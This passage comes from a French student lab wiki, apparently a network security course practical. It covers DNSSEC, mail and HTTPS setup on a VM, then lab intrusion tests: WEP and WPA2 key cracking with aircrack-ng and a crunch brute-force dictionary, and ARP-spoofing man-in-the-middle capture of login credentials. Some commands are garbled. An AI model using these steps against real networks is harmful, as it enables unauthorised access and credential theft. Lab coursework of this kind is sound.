On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. &lt;br /&gt;
&lt;br /&gt;
Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54021</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
